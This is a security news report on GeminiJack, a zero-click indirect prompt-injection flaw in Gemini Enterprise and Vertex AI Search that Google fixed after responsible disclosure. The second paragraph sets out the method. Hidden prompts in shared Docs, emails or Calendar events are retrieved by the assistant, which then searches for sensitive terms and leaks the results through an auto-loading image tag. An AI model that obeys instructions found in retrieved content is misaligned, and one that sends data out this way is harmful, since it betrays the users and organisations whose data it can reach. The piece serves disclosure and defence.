Google Fixes GeminiJack Zero-Click Flaw in Gemini Enterprise

Google has fixed a critical zero-click vulnerability, named “GeminiJack,” affecting its Gemini Enterprise AI tools and Vertex AI Search, which could allow silent exfiltration of sensitive corporate data. The issue was discovered in June 2025 by Noma Security researchers and responsibly disclosed to Google. The vulnerability abused Retrieval-Augmented Generation (RAG) behavior, enabling attackers to inject malicious instructions into seemingly harmless content such as Google Docs, Gmail emails, or Calendar events shared within an organization.
The attack relied on content poisoning, where hidden prompts were embedded inside accessible Workspace files. These prompts instructed Gemini to search for sensitive terms like “budget” or “sales” across authorized data sources. When a user performed a normal AI query, Gemini retrieved the poisoned content, treated it as trusted input, and extracted relevant data from Gmail, Docs, and Calendar. The stolen information was then covertly embedded inside a malicious HTML image tag, which the browser automatically loaded, transmitting data to an attacker-controlled server without any user interaction or alerts. Since the AI itself executed the data retrieval and exfiltration, traditional DLP, endpoint, and perimeter security controls were unable to detect the activity.
Google acknowledged the vulnerability in August 2025 and implemented security fixes, including separating Vertex AI Search from Gemini Enterprise and strengthening trust boundaries within RAG workflows. A proof-of-concept was later published on December 8, 2025. Security experts warn that as AI agents gain broader access to enterprise data, risks from indirect prompt injection will continue to rise, highlighting the need for stricter permission models, AI-specific monitoring, and prompt validation mechanisms. This incident demonstrates the growing dual-use risk of enterprise AI and how a single flaw can significantly expand an organization’s attack surface.